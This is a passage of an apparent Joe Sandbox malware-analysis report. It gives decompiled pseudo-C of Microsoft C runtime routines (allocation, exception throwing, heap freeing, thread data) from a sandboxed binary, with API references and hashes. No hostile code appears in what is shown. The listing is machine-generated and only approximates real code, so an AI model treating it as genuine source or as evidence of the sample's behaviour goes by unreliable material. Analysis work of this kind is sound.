                    						__eflags =  *0x57a1a4 & 0x00000001;
                    						if(( *0x57a1a4 & 0x00000001) == 0) {
                    							 *0x57a1a4 =  *0x57a1a4 | 0x00000001;
                    							__eflags =  *0x57a1a4;
                    							E0040447B(0x57a198);
                    							E00405A8C( *0x57a1a4, 0x40baa2);
                    						}
                    						E00403A4B( &_v16, 0x57a198);
                    						_push(0x40dac0);
                    						_push( &_v16);
                    						L7();
                    						asm("int3");
                    						_push(0x57a198);
                    						_push(_t38);
                    						_t34 = 8;
                    						_v36 = memcpy( &_v60, 0x401394, _t34 << 2);
                    						_t26 = _v16;
                    						_v32 = _t26;
                    						__eflags = _t26;
                    						if(_t26 != 0) {
                    							__eflags =  *_t26 & 0x00000008;
                    							if(( *_t26 & 0x00000008) != 0) {
                    								_v20 = 0x1994000;
                    							}
                    						}
                    						_t27 =  &_v20;
                    						RaiseException(_v40, _v36, _v24, _t27);
                    						return _t27;
                    					} else {
                    						continue;
                    					}
                    					L11:
                    				}
                    				return _t20;
                    				goto L11;
                    			}


















                    0x004044ad
                    0x004044ad
                    0x004044b0
                    0x004044b8
                    0x00000000
                    0x00000000
                    0x004044a3
                    0x004044a9
                    0x004044ab
                    0x004044bc
                    0x004044c8
                    0x004044ca
                    0x004044ca
                    0x004044d3
                    0x004044dd
                    0x004044e2
                    0x004044e7
                    0x004044ec
                    0x004044f4
                    0x004044f5
                    0x004044fa
                    0x00404506
                    0x00404507
                    0x0040450a
                    0x00404515
                    0x00404518
                    0x0040451c
                    0x00404520
                    0x00404522
                    0x00404524
                    0x00404527
                    0x00404529
                    0x00404529
                    0x00404527
                    0x00404530
                    0x0040453d
                    0x00404544
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004044ab
                    0x004044bb
                    0x00000000

                    APIs
                    • _malloc.LIBCMT ref: 004044B0
                      • Part of subcall function 00404DCA: __FF_MSGBANNER.LIBCMT ref: 00404DED
                      • Part of subcall function 00404DCA: __NMSG_WRITE.LIBCMT ref: 00404DF4
                      • Part of subcall function 00404DCA: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,00404222,00000001,?,?,?,?,?,00402F4F,?), ref: 00404E41
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 004044D3
                      • Part of subcall function 0040447B: std::exception::exception.LIBCMT ref: 00404487
                    • std::bad_exception::bad_exception.LIBCMT ref: 004044E7
                    • __CxxThrowException@8.LIBCMT ref: 004044F5
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                    • String ID: 9@
                    • API String ID: 1411284514-2624149686
                    • Opcode ID: 3f8f8e7280837c27fcb78c74a1786ec937c5913403e5546fef38f7095140068c
                    • Instruction ID: 4b48c1a83ea22fe80c67c3ef89986cabe4756f8b7491aebdc77331ca37afcba3
                    • Opcode Fuzzy Hash: 3f8f8e7280837c27fcb78c74a1786ec937c5913403e5546fef38f7095140068c
                    • Instruction Fuzzy Hash: 85F0E97060020466DB04B662EC16B5E3E589FC032CB14803FFD04751D2DB3C9945D96D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00404194() {
                    				intOrPtr _v16;
                    				void* _v28;
                    				void* _v64;
                    				void* _v104;
                    				void* __esi;
                    				void* _t17;
                    				intOrPtr* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr* _t22;
                    				void* _t24;
                    
                    				_push(0x44);
                    				E00404CAA(E0040BA6C, _t17, _t20, _t21);
                    				E00403FBB(_t24 - 0x28, _t20, "invalid string position");
                    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                    				_t19 = _t24 - 0x50;
                    				E0040410D(_t19, _t24 - 0x28);
                    				E004044FB(_t24 - 0x50, 0x40dc7c);
                    				asm("int3");
                    				_push(_t24);
                    				_push(_t21);
                    				_push(_v16);
                    				_t22 = _t19;
                    				E00404025(_t19);
                    				 *_t22 = 0x40133c;
                    				return _t22;
                    			}














                    0x00404194
                    0x0040419b
                    0x004041a8
                    0x004041ad
                    0x004041b5
                    0x004041b8
                    0x004041c6
                    0x004041cb
                    0x004041ce
                    0x004041d1
                    0x004041d2
                    0x004041d5
                    0x004041d7
                    0x004041dc
                    0x004041e6

                    APIs
                    • __EH_prolog3.LIBCMT ref: 0040419B
                    • std::bad_exception::bad_exception.LIBCMT ref: 004041B8
                    • __CxxThrowException@8.LIBCMT ref: 004041C6
                      • Part of subcall function 004044FB: RaiseException.KERNEL32(?,?,004044FA,?,?,?,?,9@,004044FA,?,0040DAC0,0057A198,?,004039E2,?), ref: 0040453D
                      • Part of subcall function 00404025: __EH_prolog.LIBCMT ref: 0040402A
                      • Part of subcall function 00404025: std::exception::exception.LIBCMT ref: 0040403B
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                    • String ID: 5A@$invalid string position
                    • API String ID: 255094582-3784145193
                    • Opcode ID: 7c60f25f8d0440b76b18487978f90ad4e52a6ac8384dc5be328e918e4f911517
                    • Instruction ID: 607e15567fa4394d7e1728ce67b10124f211bfbe59a1c0b2f7c869206f80b444
                    • Opcode Fuzzy Hash: 7c60f25f8d0440b76b18487978f90ad4e52a6ac8384dc5be328e918e4f911517
                    • Instruction Fuzzy Hash: F0F030B290021867D704EAD2D805ECEBB78EB54765F54103BF700765D1DBB99944C7AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00405B89(intOrPtr* _a4) {
                    				signed int _v8;
                    				void* __ebp;
                    				intOrPtr* _t15;
                    				intOrPtr* _t18;
                    				void* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    
                    				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                    				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                    					__eflags =  *((intOrPtr*)(E00406A5A(_t22, _t23, __eflags) + 0x90));
                    					if(__eflags > 0) {
                    						_t15 = E00406A5A(_t22, _t23, __eflags) + 0x90;
                    						 *_t15 =  *_t15 - 1;
                    						__eflags =  *_t15;
                    					}
                    					goto L9;
                    				} else {
                    					__eflags = __eax - 0xe06d7363;
                    					if(__eflags != 0) {
                    						L9:
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						 *(E00406A5A(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                    						_push(8);
                    						_push(0x40dce8);
                    						E00406E94(_t22, _t24, _t25);
                    						_t18 =  *((intOrPtr*)(E00406A5A(_t22, _t23, _t30) + 0x78));
                    						if(_t18 != 0) {
                    							_v8 = _v8 & 0x00000000;
                    							 *_t18();
                    							_v8 = 0xfffffffe;
                    						}
                    						return E00406ED9(E00406D7C(_t22, _t23, _t24, _t25));
                    					}
                    				}
                    			}











                    0x00405b95
                    0x00405b9a
                    0x00405bb9
                    0x00405bc0
                    0x00405bc7
                    0x00405bcc
                    0x00405bcc
                    0x00405bcc
                    0x00000000
                    0x00405b9c
                    0x00405b9c
                    0x00405ba1
                    0x00405bce
                    0x00405bce
                    0x00405bd1
                    0x00405ba3
                    0x00405ba8
                    0x0040494f
                    0x00404951
                    0x00404956
                    0x00404960
                    0x00404965
                    0x00404967
                    0x0040496b
                    0x00404976
                    0x00404976
                    0x00404987
                    0x00404987
                    0x00405ba1

                    APIs
                    • __getptd.LIBCMT ref: 00405BA3
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405BB4
                    • __getptd.LIBCMT ref: 00405BC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$csm
                    • API String ID: 803148776-1389381023
                    • Opcode ID: ee9f28c399f4596c4d47a8939a460f410f000b5e59a68f6aac1da9382e076d26
                    • Instruction ID: 088ae7dc6b13c634807322a86cacde43e2a1134fa021847d7b137c037cf3fd9d
                    • Opcode Fuzzy Hash: ee9f28c399f4596c4d47a8939a460f410f000b5e59a68f6aac1da9382e076d26
                    • Instruction Fuzzy Hash: 42E01A312106048FD710FA69C446B2A36A6FB85318F1652B7E509EB3A2C77CF850994A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040983D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				long _t23;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x40e020);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t31 = E00406A5A(__ebx, __edx, _t35);
                    				_t15 =  *0x42047c; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E004081FA(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x420248; // 0x7915f0
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(_t33 != 0) {
                    							_t23 = InterlockedDecrement(_t33);
                    							__eflags = _t23;
                    							if(_t23 == 0) {
                    								__eflags = _t33 - 0x41fe20;
                    								if(__eflags != 0) {
                    									_push(_t33);
                    									E00404E94(_t25, _t31, _t33, __eflags);
                    								}
                    							}
                    						}
                    						_t21 =  *0x420248; // 0x7915f0
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x420248; // 0x7915f0
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E004098D8();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				if(_t33 == 0) {
                    					E004070FC(_t29, 0x20);
                    				}
                    				return E00406ED9(_t33);
                    			}










                    0x0040983d
                    0x0040983d
                    0x0040983d
                    0x0040983d
                    0x0040983f
                    0x00409844
                    0x0040984e
                    0x00409850
                    0x00409858
                    0x00409879
                    0x0040987f
                    0x00409883
                    0x00409886
                    0x00409889
                    0x0040988f
                    0x00409891
                    0x00409893
                    0x00409896
                    0x0040989c
                    0x0040989e
                    0x004098a0
                    0x004098a6
                    0x004098a8
                    0x004098a9
                    0x004098ae
                    0x004098a6
                    0x0040989e
                    0x004098af
                    0x004098b4
                    0x004098b7
                    0x004098bd
                    0x004098c1
                    0x004098c1
                    0x004098c7
                    0x004098ce
                    0x00409860
                    0x00409860
                    0x00409860
                    0x00409865
                    0x00409869
                    0x0040986e
                    0x00409876

                    APIs
                    • __getptd.LIBCMT ref: 00409849
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __amsg_exit.LIBCMT ref: 00409869
                    • __lock.LIBCMT ref: 00409879
                    • InterlockedDecrement.KERNEL32(?), ref: 00409896
                    • InterlockedIncrement.KERNEL32(007915F0), ref: 004098C1
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                    • String ID:
                    • API String ID: 4271482742-0
                    • Opcode ID: 7a4b01069ac0e791db80349cc32a92b235009e9e6e672071b789ae931b0c6b02
                    • Instruction ID: d5f692d2632406425e7fa88da1b48326db9ae83c0cc23e1057f582249af43721
                    • Opcode Fuzzy Hash: 7a4b01069ac0e791db80349cc32a92b235009e9e6e672071b789ae931b0c6b02
                    • Instruction Fuzzy Hash: 71013932A107219BD720BB66980575EB7A0AF05724F05817BE505777E2CB3CAD82CBDD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E00404E94(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr* _t10;
                    				intOrPtr _t13;
                    				intOrPtr _t23;
                    				void* _t25;
                    
                    				_push(0xc);
                    				_push(0x40dd70);
                    				_t8 = E00406E94(__ebx, __edi, __esi);
                    				_t23 =  *((intOrPtr*)(_t25 + 8));
                    				if(_t23 == 0) {
                    					L9:
                    					return E00406ED9(_t8);
                    				}
                    				if( *0x57ac58 != 3) {
                    					_push(_t23);
                    					L7:
                    					if(HeapFree( *0x57a634, 0, ??) == 0) {
                    						_t10 = E004055B4();
                    						 *_t10 = E00405572(GetLastError());
                    					}
                    					goto L9;
                    				}
                    				E004081FA(__ebx, __edi, 4);
                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                    				_t13 = E0040822D(_t23);
                    				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                    				if(_t13 != 0) {
                    					_push(_t23);
                    					_push(_t13);
                    					E0040825D();
                    				}
                    				 *(_t25 - 4) = 0xfffffffe;
                    				_t8 = E00404EEA();
                    				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                    					goto L9;
                    				} else {
                    					_push( *((intOrPtr*)(_t25 + 8)));
                    					goto L7;
                    				}
                    			}







                    0x00404e94
                    0x00404e96
                    0x00404e9b
                    0x00404ea0
                    0x00404ea5
                    0x00404f1c
                    0x00404f21
                    0x00404f21
                    0x00404eae
                    0x00404ef3
                    0x00404ef4
                    0x00404f04
                    0x00404f06
                    0x00404f19
                    0x00404f1b
                    0x00000000
                    0x00404f04
                    0x00404eb2
                    0x00404eb8
                    0x00404ebd
                    0x00404ec3
                    0x00404ec8
                    0x00404eca
                    0x00404ecb
                    0x00404ecc
                    0x00404ed2
                    0x00404ed3
                    0x00404eda
                    0x00404ee3
                    0x00000000
                    0x00404ee5
                    0x00404ee5
                    0x00000000
                    0x00404ee5

                    APIs
                    • __lock.LIBCMT ref: 00404EB2
                      • Part of subcall function 004081FA: __mtinitlocknum.LIBCMT ref: 00408210
                      • Part of subcall function 004081FA: __amsg_exit.LIBCMT ref: 0040821C
                      • Part of subcall function 004081FA: EnterCriticalSection.KERNEL32(?,?,?,0040A78B,00000004,0040E0C0,0000000C,004091B9,?,?,00000000,00000000,00000000,?,00406A0C,00000001), ref: 00408224
                    • ___sbh_find_block.LIBCMT ref: 00404EBD
                    • ___sbh_free_block.LIBCMT ref: 00404ECC
                    • HeapFree.KERNEL32(00000000,?,0040DD70,0000000C,004081DB,00000000,0040DFA0,0000000C,00408215,?,?,?,0040A78B,00000004,0040E0C0,0000000C), ref: 00404EFC
                    • GetLastError.KERNEL32(?,0040A78B,00000004,0040E0C0,0000000C,004091B9,?,?,00000000,00000000,00000000,?,00406A0C,00000001,00000214), ref: 00404F0D
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2714421763-0
                    • Opcode ID: 2013ba940d313ea34614954f8034e6e5243da2ea7a950902972affa3b42f616b
                    • Instruction ID: d1ded028c465c40576e6591e98055ed8ed7d3535dd24929ba185c550c2564aac
                    • Opcode Fuzzy Hash: 2013ba940d313ea34614954f8034e6e5243da2ea7a950902972affa3b42f616b
                    • Instruction Fuzzy Hash: DF01AC71841355E6DF206BB2EC06B5F7664AF50314F20007FF504761D1CF3C89409A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 19%
                    			E004061E7(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				void* __ebp;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				intOrPtr* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t26 = __esi;
                    				_t25 = __edi;
                    				_t22 = __ebx;
                    				_t29 = _a20;
                    				if(_a20 != 0) {
                    					_push(_a20);
                    					_push(__ebx);
                    					_push(__esi);
                    					_push(_a4);
                    					E00406155(__ebx, __edi, __esi, _t29);
                    					_t27 = _t27 + 0x10;
                    				}
                    				_t30 = _a28;
                    				_push(_a4);
                    				if(_a28 != 0) {
                    					_push(_a28);
                    				} else {
                    					_push(_t26);
                    				}
                    				E00404580(_t23);
                    				_push( *_t25);
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_t26);
                    				E00405BD2(_t22, _t25, _t26, _t30);
                    				_push(0x100);
                    				_push(_a24);
                    				_push(_a16);
                    				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                    				_push(_a8);
                    				_push(_t26);
                    				_push(_a4);
                    				_t20 = E00405E3A( *((intOrPtr*)(_t22 + 0xc)));
                    				if(_t20 != 0) {
                    					E00404547(_t20, _t26);
                    					return _t20;
                    				}
                    				return _t20;
                    			}










                    0x004061e7
                    0x004061e7
                    0x004061e7
                    0x004061ec
                    0x004061f0
                    0x004061f2
                    0x004061f5
                    0x004061f6
                    0x004061f7
                    0x004061fa
                    0x004061ff
                    0x004061ff
                    0x00406202
                    0x00406206
                    0x00406209
                    0x0040620e
                    0x0040620b
                    0x0040620b
                    0x0040620b
                    0x00406211
                    0x00406216
                    0x00406218
                    0x0040621b
                    0x0040621e
                    0x0040621f
                    0x00406227
                    0x0040622c
                    0x00406230
                    0x00406233
                    0x00406236
                    0x0040623c
                    0x0040623d
                    0x00406240
                    0x0040624a
                    0x0040624e
                    0x00000000
                    0x0040624e
                    0x00406254

                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 004061FA
                      • Part of subcall function 00406155: ___BuildCatchObjectHelper.LIBCMT ref: 0040618B
                    • _UnwindNestedFrames.LIBCMT ref: 00406211
                    • ___FrameUnwindToState.LIBCMT ref: 0040621F
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm
                    • API String ID: 2163707966-1018135373
                    • Opcode ID: 26d346e03a40db835789a22d0e8c6be2908a1210ab3643219c2a302355f7339c
                    • Instruction ID: 63b3a2b4d35b384e587e2a1477fbb4ef3cb260e6671f1a1435f59bc2ed9a7f00
                    • Opcode Fuzzy Hash: 26d346e03a40db835789a22d0e8c6be2908a1210ab3643219c2a302355f7339c
                    • Instruction Fuzzy Hash: 00014B71000109BBDF126F51CC45EAB7F6AEF48358F01402AFE59251A1D73AD9B1DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00403FEC(void* __edi) {
                    				intOrPtr* _t26;
                    				intOrPtr _t30;
                    				intOrPtr* _t34;
                    				void* _t36;
                    
                    				E00404930(E0040BA36, _t36);
                    				E00403FBB(_t36 - 0x28, __edi, "vector<T> too long");
                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                    				_t26 = _t36 - 0x50;
                    				E00403F76(_t26, _t36 - 0x28);
                    				E004044FB(_t36 - 0x50, 0x40dba0);
                    				asm("int3");
                    				E00404930(E0040BA48, _t36);
                    				_push(_t26);
                    				_push(__edi);
                    				_t30 =  *((intOrPtr*)(_t36 + 8));
                    				_t34 = _t26;
                    				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                    				E0040426A(_t26, _t30);
                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                    				_t31 = _t30 + 0xc;
                    				 *_t34 = 0x401300;
                    				E00403EF7(_t34 + 0xc, _t30 + 0xc, _t31);
                    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                    				return _t34;
                    			}







                    0x00403ff1
                    0x00404001
                    0x00404006
                    0x0040400e
                    0x00404011
                    0x0040401f
                    0x00404024
                    0x0040402a
                    0x0040402f
                    0x00404031
                    0x00404032
                    0x00404035
                    0x00404038
                    0x0040403b
                    0x00404040
                    0x00404044
                    0x0040404b
                    0x00404051
                    0x0040405d
                    0x00404065

                    APIs
                    • __EH_prolog.LIBCMT ref: 00403FF1
                    • std::bad_exception::bad_exception.LIBCMT ref: 00404011
                    • __CxxThrowException@8.LIBCMT ref: 0040401F
                      • Part of subcall function 004044FB: RaiseException.KERNEL32(?,?,004044FA,?,?,?,?,9@,004044FA,?,0040DAC0,0057A198,?,004039E2,?), ref: 0040453D
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
                    • String ID: vector<T> too long
                    • API String ID: 1606262581-3788999226
                    • Opcode ID: 23d040404656ac5d381abd0d0b7d0bad413092a48b3cb31ccf11021518d71602
                    • Instruction ID: 1d29dda6a968adb5d7e5ea7ed480521e30fed810e91d497e203154d6009b3c35
                    • Opcode Fuzzy Hash: 23d040404656ac5d381abd0d0b7d0bad413092a48b3cb31ccf11021518d71602
                    • Instruction Fuzzy Hash: 55D012F1D1410856C700FAF5C856ADDB73CAB14715F50403BB201B10D5DB7C66088678
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004095A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t13;
                    				intOrPtr _t27;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ebx;
                    				_push(0xc);
                    				_push(0x40e000);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t29 = E00406A5A(__ebx, __edx, _t31);
                    				_t13 =  *0x42047c; // 0xfffffffe
                    				if(( *(_t29 + 0x70) & _t13) == 0) {
                    					L6:
                    					E004081FA(_t22, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t8 = _t29 + 0x6c; // 0x6c
                    					_t27 =  *0x41fe10; // 0x41fd38
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00409563(_t8, _t27);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E0040960B();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                    					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E00406A5A(_t22, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				if(_t29 == 0) {
                    					E004070FC(_t25, 0x20);
                    				}
                    				return E00406ED9(_t29);
                    			}








                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a3
                    0x004095a8
                    0x004095b2
                    0x004095b4
                    0x004095bc
                    0x004095e0
                    0x004095e2
                    0x004095e8
                    0x004095ec
                    0x004095ef
                    0x004095fa
                    0x004095fd
                    0x00409604
                    0x004095be
                    0x004095be
                    0x004095c2
                    0x00000000
                    0x004095c4
                    0x004095c9
                    0x004095c9
                    0x004095c2
                    0x004095ce
                    0x004095d2
                    0x004095d7
                    0x004095df

                    APIs
                    • __getptd.LIBCMT ref: 004095AD
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 004095C4
                    • __amsg_exit.LIBCMT ref: 004095D2
                    • __lock.LIBCMT ref: 004095E2
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
